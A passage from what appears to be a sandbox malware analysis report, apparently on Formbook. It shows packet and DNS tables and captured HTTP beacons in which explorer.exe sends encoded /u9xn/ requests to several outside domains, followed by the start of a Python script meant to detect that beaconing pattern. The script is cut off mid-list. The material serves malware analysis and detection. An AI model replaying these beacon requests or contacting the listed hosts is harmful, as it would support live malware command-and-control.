                                          Oct 13, 2021 16:44:41.150091887 CEST | 80 | 49791 | 46.101.121.244 | 192.168.2.5
                                          Oct 13, 2021 16:44:41.303195953 CEST | 80 | 49791 | 46.101.121.244 | 192.168.2.5
                                          Oct 13, 2021 16:44:41.303220034 CEST | 80 | 49791 | 46.101.121.244 | 192.168.2.5
                                          Oct 13, 2021 16:44:41.303375959 CEST | 49791 | 80 | 192.168.2.5 | 46.101.121.244
                                          Oct 13, 2021 16:44:41.303476095 CEST | 49791 | 80 | 192.168.2.5 | 46.101.121.244
                                          Oct 13, 2021 16:44:41.326456070 CEST | 80 | 49791 | 46.101.121.244 | 192.168.2.5
                                          Oct 13, 2021 16:44:46.371398926 CEST | 49793 | 80 | 192.168.2.5 | 74.208.236.134
                                          Oct 13, 2021 16:44:46.515207052 CEST | 80 | 49793 | 74.208.236.134 | 192.168.2.5
                                          Oct 13, 2021 16:44:46.515362024 CEST | 49793 | 80 | 192.168.2.5 | 74.208.236.134
                                          Oct 13, 2021 16:44:46.515561104 CEST | 49793 | 80 | 192.168.2.5 | 74.208.236.134
                                          Oct 13, 2021 16:44:46.662605047 CEST | 80 | 49793 | 74.208.236.134 | 192.168.2.5
                                          Oct 13, 2021 16:44:46.664726973 CEST | 80 | 49793 | 74.208.236.134 | 192.168.2.5
                                          Oct 13, 2021 16:44:46.664763927 CEST | 80 | 49793 | 74.208.236.134 | 192.168.2.5
                                          Oct 13, 2021 16:44:46.665534973 CEST | 49793 | 80 | 192.168.2.5 | 74.208.236.134
                                          Oct 13, 2021 16:44:46.665771008 CEST | 49793 | 80 | 192.168.2.5 | 74.208.236.134
                                          Oct 13, 2021 16:44:46.814018011 CEST | 80 | 49793 | 74.208.236.134 | 192.168.2.5
                                          Oct 13, 2021 16:45:02.291773081 CEST | 49797 | 80 | 192.168.2.5 | 3.64.163.50
                                          Oct 13, 2021 16:45:02.310440063 CEST | 80 | 49797 | 3.64.163.50 | 192.168.2.5
                                          Oct 13, 2021 16:45:02.310652018 CEST | 49797 | 80 | 192.168.2.5 | 3.64.163.50
                                          Oct 13, 2021 16:45:02.310893059 CEST | 49797 | 80 | 192.168.2.5 | 3.64.163.50
                                          Oct 13, 2021 16:45:02.328926086 CEST | 80 | 49797 | 3.64.163.50 | 192.168.2.5
                                          Oct 13, 2021 16:45:02.328963041 CEST | 80 | 49797 | 3.64.163.50 | 192.168.2.5
                                          Oct 13, 2021 16:45:02.328974009 CEST | 80 | 49797 | 3.64.163.50 | 192.168.2.5
                                          Oct 13, 2021 16:45:02.329202890 CEST | 49797 | 80 | 192.168.2.5 | 3.64.163.50
                                          Oct 13, 2021 16:45:02.329302073 CEST | 49797 | 80 | 192.168.2.5 | 3.64.163.50
                                          Oct 13, 2021 16:45:02.348476887 CEST | 80 | 49797 | 3.64.163.50 | 192.168.2.5

                                          UDP Packets

                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Oct 13, 2021 16:44:14.384646893 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:14.506238937 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:44:20.181121111 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:20.211018085 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:44:25.232558966 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:25.272434950 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:44:30.433674097 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:30.844825983 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:44:35.857575893 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:36.038960934 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:44:41.058072090 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:41.082652092 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:44:46.351602077 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:46.370044947 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:44:51.682477951 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:52.131743908 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:44:57.200576067 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:44:57.224594116 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:45:02.261354923 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:45:02.290517092 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:45:07.338278055 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:45:07.366216898 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
                                          Oct 13, 2021 16:45:12.463208914 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
                                          Oct 13, 2021 16:45:12.486450911 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5

                                          DNS Queries

                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                          Oct 13, 2021 16:44:14.384646893 CEST | 192.168.2.5 | 8.8.8.8 | 0xfa8a | Standard query (0) | www.highvizpeople.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:20.181121111 CEST | 192.168.2.5 | 8.8.8.8 | 0xa615 | Standard query (0) | www.ttemola.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:25.232558966 CEST | 192.168.2.5 | 8.8.8.8 | 0x4912 | Standard query (0) | www.oddanimalsink.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:30.433674097 CEST | 192.168.2.5 | 8.8.8.8 | 0x7083 | Standard query (0) | www.umgaleloacademy.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:35.857575893 CEST | 192.168.2.5 | 8.8.8.8 | 0xafc8 | Standard query (0) | www.baybeg.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:41.058072090 CEST | 192.168.2.5 | 8.8.8.8 | 0x9ad1 | Standard query (0) | www.itskosi.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:46.351602077 CEST | 192.168.2.5 | 8.8.8.8 | 0xf190 | Standard query (0) | www.crisisinterventionadvocates.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:51.682477951 CEST | 192.168.2.5 | 8.8.8.8 | 0x43b1 | Standard query (0) | www.ishhs.xyz | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:57.200576067 CEST | 192.168.2.5 | 8.8.8.8 | 0xb3d4 | Standard query (0) | www.sfcn-dng.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:45:02.261354923 CEST | 192.168.2.5 | 8.8.8.8 | 0x428 | Standard query (0) | www.everythangbutwhite.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:45:07.338278055 CEST | 192.168.2.5 | 8.8.8.8 | 0xc6a6 | Standard query (0) | www.shopthatlookboutique.com | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:45:12.463208914 CEST | 192.168.2.5 | 8.8.8.8 | 0x3df5 | Standard query (0) | www.christinegagnonjewellery.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          Oct 13, 2021 16:44:14.506238937 CEST | 8.8.8.8 | 192.168.2.5 | 0xfa8a | No error (0) | www.highvizpeople.com | | 208.91.197.27 | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:20.211018085 CEST | 8.8.8.8 | 192.168.2.5 | 0xa615 | Name error (3) | www.ttemola.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:25.272434950 CEST | 8.8.8.8 | 192.168.2.5 | 0x4912 | No error (0) | www.oddanimalsink.com | oddanimalsink.com | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 13, 2021 16:44:25.272434950 CEST | 8.8.8.8 | 192.168.2.5 | 0x4912 | No error (0) | oddanimalsink.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:30.844825983 CEST | 8.8.8.8 | 192.168.2.5 | 0x7083 | Server failure (2) | www.umgaleloacademy.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:41.082652092 CEST | 8.8.8.8 | 192.168.2.5 | 0x9ad1 | No error (0) | www.itskosi.com | | 46.101.121.244 | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:41.082652092 CEST | 8.8.8.8 | 192.168.2.5 | 0x9ad1 | No error (0) | www.itskosi.com | | 206.189.50.215 | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:46.370044947 CEST | 8.8.8.8 | 192.168.2.5 | 0xf190 | No error (0) | www.crisisinterventionadvocates.com | | 74.208.236.134 | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:52.131743908 CEST | 8.8.8.8 | 192.168.2.5 | 0x43b1 | Name error (3) | www.ishhs.xyz | none | none | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:44:57.224594116 CEST | 8.8.8.8 | 192.168.2.5 | 0xb3d4 | Name error (3) | www.sfcn-dng.com | none | none | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:45:02.290517092 CEST | 8.8.8.8 | 192.168.2.5 | 0x428 | No error (0) | www.everythangbutwhite.com | | 3.64.163.50 | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:45:07.366216898 CEST | 8.8.8.8 | 192.168.2.5 | 0xc6a6 | No error (0) | www.shopthatlookboutique.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
                                          Oct 13, 2021 16:45:07.366216898 CEST | 8.8.8.8 | 192.168.2.5 | 0xc6a6 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
                                          Oct 13, 2021 16:45:12.486450911 CEST | 8.8.8.8 | 192.168.2.5 | 0x3df5 | Name error (3) | www.christinegagnonjewellery.com | none | none | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.highvizpeople.com
                                          • www.oddanimalsink.com
                                          • www.itskosi.com
                                          • www.crisisinterventionadvocates.com
                                          • www.everythangbutwhite.com

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.5 | 49787 | 208.91.197.27 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 13, 2021 16:44:14.661981106 CEST | 4115 | OUT | GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.highvizpeople.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:14.906196117 CEST | 4117 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 13 Oct 2021 14:44:14 GMT
                                          Server: Apache
                                          Set-Cookie: vsid=919vr3816818547928602; expires=Mon, 12-Oct-2026 14:44:14 GMT; Max-Age=157680000; path=/; domain=www.highvizpeople.com; HttpOnly
                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KQL0Qewm/57A7d4wt4OHK1+3N7YmuFf9rlEyC7xrWthCcsfi2zFqQt+3/QwUNakTWu2Rc2ZBUwg9yn9iy5bcVQ==
                                          Keep-Alive: timeout=5, max=102
                                          Connection: Keep-Alive
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 34 65 36 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 4b 51 4c 30 51 65 77 6d 2f 35 37 41 37 64 34 77 74 34 4f 48 4b 31 2b 33 4e 37 59 6d 75 46 66 39 72 6c 45 79 43 37 78 72 57 74 68 43 63 73 66 69 32 7a 46 71 51 74 2b 33 2f 51 77 55 4e 61 6b 54 57 75 32 52 63 32 5a 42 55 77 67 39 79 6e 39 69 79 35 62 63 56 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 69 67 68 76 69 7a 70 65 6f 70 6c 65 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 69 67 68 76 69 7a 70 65 6f 70 6c 65 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 
6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d
                                          Data Ascii: 4e65<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KQL0Qewm/57A7d4wt4OHK1+3N7YmuFf9rlEyC7xrWthCcsfi2zFqQt+3/QwUNakTWu2Rc2ZBUwg9yn9iy5bcVQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.highvizpeople.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.highvizpeople.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";im


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.5 | 49790 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 13, 2021 16:44:25.292716026 CEST | 5623 | OUT | GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.oddanimalsink.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:25.406374931 CEST | 5623 | IN | HTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Wed, 13 Oct 2021 14:44:25 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "615f9601-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.5 | 49791 | 46.101.121.244 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 13, 2021 16:44:41.115659952 CEST | 5625 | OUT | GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.itskosi.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:41.303195953 CEST | 5625 | IN | HTTP/1.1 301 Moved Permanently
                                          cache-control: public, max-age=0, must-revalidate
                                          content-length: 45
                                          content-type: text/plain
                                          date: Wed, 13 Oct 2021 14:44:41 GMT
                                          age: 0
                                          location: https://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo
                                          x-nf-request-id: 01FHX1SM1KDY80SN7YV2CH4TJD
                                          server: Netlify
                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 73 6b 6f 73 69 2e 63 6f 6d 2f 75 39 78 6e 2f 0a
                                          Data Ascii: Redirecting to https://www.itskosi.com/u9xn/


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          3 | 192.168.2.5 | 49793 | 74.208.236.134 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 13, 2021 16:44:46.515561104 CEST | 5635 | OUT | GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.crisisinterventionadvocates.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:46.664726973 CEST | 5635 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 626
                                          Connection: close
                                          Date: Wed, 13 Oct 2021 14:44:46 GMT
                                          Server: Apache
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          4 | 192.168.2.5 | 49797 | 3.64.163.50 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 13, 2021 16:45:02.310893059 CEST | 5649 | OUT | GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.everythangbutwhite.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:45:02.328963041 CEST | 5650 | IN | HTTP/1.1 410 Gone
                                          Server: openresty
                                          Date: Wed, 13 Oct 2021 14:45:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 36 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 65 72 79 74 68 61 6e 67 62 75 74 77 68 69 74 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 65 72 79 74 68 61 6e 67 62 75 74 77 68 69 74 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='5; url=http://www.everythangbutwhite.com/' />a </head>9 <body>42 You are being redirected to http://www.everythangbutwhite.coma </body>8</html>0
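
                                          The five sessions above share one shape that a detector should key on rather than on any single domain: the same process (explorer.exe, not a browser) sends a plain-HTTP GET with the same path (/u9xn/), the same two query parameters, a constant second parameter value (PjlT=JhfHclW8zdo) and a seven-byte all-NUL body to a different host each time, after a run of A lookups spaced roughly five seconds apart, several of which fail with NXDOMAIN or SERVFAIL. The script below is an added example, not code from this Joe Sandbox report and not Formbook's own code. Its two input lists are constructed from the DNS Queries/Answers tables and the HTTP sessions on this page (timestamps rounded to microseconds, one constructed benign browser request added as a control); the BROWSERS allow-list, the thresholds and the treatment of SERVFAIL as a failed lookup are assumptions.

```python
"""Heuristics for the beaconing pattern captured in this report.

Added example: not code from the Joe Sandbox report and not Formbook's code.
The sample logs are constructed from the DNS and HTTP tables on this page;
the browser list and the thresholds are assumptions.
"""
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

TS_FMT = "%Y-%m-%d %H:%M:%S.%f"

# Assumption: the processes expected to originate plain-HTTP traffic on a workstation.
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}

# Constructed from the HTTP sessions above: (timestamp, process, Host, request line, body).
HTTP_REQUESTS = [
    ("2021-10-13 16:44:14.661981", r"C:\Windows\explorer.exe", "www.highvizpeople.com",
     "GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1",
     b"\x00" * 7),
    ("2021-10-13 16:44:25.292716", r"C:\Windows\explorer.exe", "www.oddanimalsink.com",
     "GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1",
     b"\x00" * 7),
    ("2021-10-13 16:44:41.115660", r"C:\Windows\explorer.exe", "www.itskosi.com",
     "GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1",
     b"\x00" * 7),
    # Constructed benign control: a browser page load that must not be flagged.
    ("2021-10-13 16:44:50.000000", r"C:\Program Files\Mozilla Firefox\firefox.exe",
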